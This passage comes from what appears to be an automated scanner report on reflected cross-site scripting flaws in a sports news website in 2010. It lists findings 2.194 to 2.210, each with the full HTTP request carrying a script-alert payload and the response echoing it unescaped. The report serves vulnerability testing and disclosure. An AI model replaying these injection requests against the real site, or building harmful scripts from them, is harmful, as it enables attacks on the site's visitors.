Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:05 GMT
Content-Length: 820
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/17/10/Cliff-Lee-quartet-no-match-for-1971-Orio/landing.html77970<script>alert(1)</script>52d6f2862ce"</strong>
...[SNIP]...

2.194. http://www.csnbaltimore.com/12/17/10/Eisenberg-Saints-test-jazzes-Ravens/landing.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/17/10/Eisenberg-Saints-test-jazzes-Ravens/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d2fad<script>alert(1)</script>b7678c4d177 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/Eisenberg-Saints-test-jazzes-Ravens/landing.htmld2fad<script>alert(1)</script>b7678c4d177 HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:04 GMT
Content-Length: 815
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/17/10/Eisenberg-Saints-test-jazzes-Ravens/landing.htmld2fad<script>alert(1)</script>b7678c4d177"</strong>
...[SNIP]...

2.195. http://www.csnbaltimore.com/12/19/10/RB-Ivory-inactive-for-Saints-vs-Ravens/landing.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/19/10/RB-Ivory-inactive-for-Saints-vs-Ravens/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload dbfd4<script>alert(1)</script>a999fa7914c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/10/RB-Ivory-inactive-for-Saints-vs-Ravens/landing.htmldbfd4<script>alert(1)</script>a999fa7914c HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:05 GMT
Content-Length: 818
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/19/10/RB-Ivory-inactive-for-Saints-vs-Ravens/landing.htmldbfd4<script>alert(1)</script>a999fa7914c"</strong>
...[SNIP]...

2.196. http://www.csnbaltimore.com/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 482cc<script>alert(1)</script>7bb299f040c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html482cc<script>alert(1)</script>7bb299f040c HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:09 GMT
Content-Length: 820
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html482cc<script>alert(1)</script>7bb299f040c"</strong>
...[SNIP]...

2.197. http://www.csnbaltimore.com/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2df49<script>alert(1)</script>ad9caa4b51a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html2df49<script>alert(1)</script>ad9caa4b51a HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:10 GMT
Content-Length: 820
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html2df49<script>alert(1)</script>ad9caa4b51a"</strong>
...[SNIP]...

2.198. http://www.csnbaltimore.com/common/global_flash/player/player.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 11101<script>alert(1)</script>7ea30cac90f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common11101<script>alert(1)</script>7ea30cac90f/global_flash/player/player.php HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:05 GMT
Content-Length: 795
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common11101<script>alert(1)</script>7ea30cac90f/global_flash/player/player.php"</strong>
...[SNIP]...

2.199. http://www.csnbaltimore.com/common/global_flash/player/player.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 42796<script>alert(1)</script>16425f7544b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flash42796<script>alert(1)</script>16425f7544b/player/player.php HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:07 GMT
Content-Length: 795
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flash42796<script>alert(1)</script>16425f7544b/player/player.php"</strong>
...[SNIP]...

2.200. http://www.csnbaltimore.com/common/global_flash/player/player.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7b920<script>alert(1)</script>7b7a88bb32 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flash/player7b920<script>alert(1)</script>7b7a88bb32/player.php HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:07 GMT
Content-Length: 794
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flash/player7b920<script>alert(1)</script>7b7a88bb32/player.php"</strong>
...[SNIP]...

2.201. http://www.csnbaltimore.com/common/global_flash/player/player.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 427d9<script>alert(1)</script>4409074b274 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flash/player/player.php427d9<script>alert(1)</script>4409074b274 HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:08 GMT
Content-Length: 795
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flash/player/player.php427d9<script>alert(1)</script>4409074b274"</strong>
...[SNIP]...

2.202. http://www.csnbaltimore.com/common/js/aggregate.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /common/js/aggregate.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2bec9<script>alert(1)</script>475f72e549d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/js/2bec9<script>alert(1)</script>475f72e549d HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:01 GMT
Content-Length: 768
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/js/2bec9<script>alert(1)</script>475f72e549d"</strong>
...[SNIP]...

2.203. http://www.csnbaltimore.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c87c9<script>alert(1)</script>f27a974b0cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c87c9<script>alert(1)</script>f27a974b0cb HTTP/1.1
Host: www.csnbaltimore.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:37:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:37:47 GMT
Connection: close
Content-Length: 758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/c87c9<script>alert(1)</script>f27a974b0cb"</strong>
...[SNIP]...

2.204. http://www.csnbaltimore.com/pages/landing [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/landing

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ec77d<script>alert(1)</script>9b71b5ef431 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagesec77d<script>alert(1)</script>9b71b5ef431/landing HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:12 GMT
Content-Length: 771
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/pagesec77d<script>alert(1)</script>9b71b5ef431/landing"</strong>
...[SNIP]...

2.205. http://www.csnbaltimore.com/pages/landing [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/landing

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 662ba<script>alert(1)</script>16228c3e9fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pages/landing662ba<script>alert(1)</script>16228c3e9fd HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:13 GMT
Content-Length: 790
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/404.html?p=/pages/landing662ba<script>alert(1)</script>16228c3e9fd"</strong>
...[SNIP]...

2.206. http://www.csnbaltimore.com/pages/landing [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/landing

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7173f"><script>alert(1)</script>6e8be881a63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/landing?7173f"><script>alert(1)</script>6e8be881a63=1 HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 30978
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:12 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<!--
web1.platformic.com
-->
<meta http-equiv="Content-Type" content="t
...[SNIP]...
<input type=hidden name="7173f"><script>alert(1)</script>6e8be881a63" id = "7173f">
...[SNIP]...

2.207. http://www.csnbaltimore.com/pages/main [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/main

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 93041<script>alert(1)</script>c8d8901bf53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages93041<script>alert(1)</script>c8d8901bf53/main HTTP/1.1
Host: www.csnbaltimore.com
Proxy-Connection: keep-alive
Referer: http://www.csnbaltimore.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:00 GMT
Connection: close
Content-Length: 768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/pages93041<script>alert(1)</script>c8d8901bf53/main"</strong>
...[SNIP]...

2.208. http://www.csnbaltimore.com/pages/main [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/main

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cf476<script>alert(1)</script>07c535177df was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pages/maincf476<script>alert(1)</script>07c535177df HTTP/1.1
Host: www.csnbaltimore.com
Proxy-Connection: keep-alive
Referer: http://www.csnbaltimore.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:00 GMT
Connection: close
Content-Length: 787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/404.html?p=/pages/maincf476<script>alert(1)</script>07c535177df"</strong>
...[SNIP]...

2.209. http://www.csnbaltimore.com/pages/main [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/main

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a7c5"><script>alert(1)</script>9bf552f789 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/main?9a7c5"><script>alert(1)</script>9bf552f789=1 HTTP/1.1
Host: www.csnbaltimore.com
Proxy-Connection: keep-alive
Referer: http://www.csnbaltimore.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Set-Cookie: PHPSESSID=09af6988921e1a055261e6e4db956dbc; path=/
Vary: Accept-Encoding
Expires: Sun, 19 Dec 2010 18:31:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:00 GMT
Connection: close
Content-Length: 71533

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<!--
web4.platformic.com
-->
<meta http-equiv="Content-Type" content="t
...[SNIP]...
<input type=hidden name="9a7c5"><script>alert(1)</script>9bf552f789" id = "9a7c5">
...[SNIP]...

2.210. http://www.csnbaltimore.com/pages/profiles [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/profiles

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d5a40<script>alert(1)</script>2fc595593ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagesd5a40<script>alert(1)</script>2fc595593ef/profiles HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:11 GMT
Content-Length: 772
Connection: close

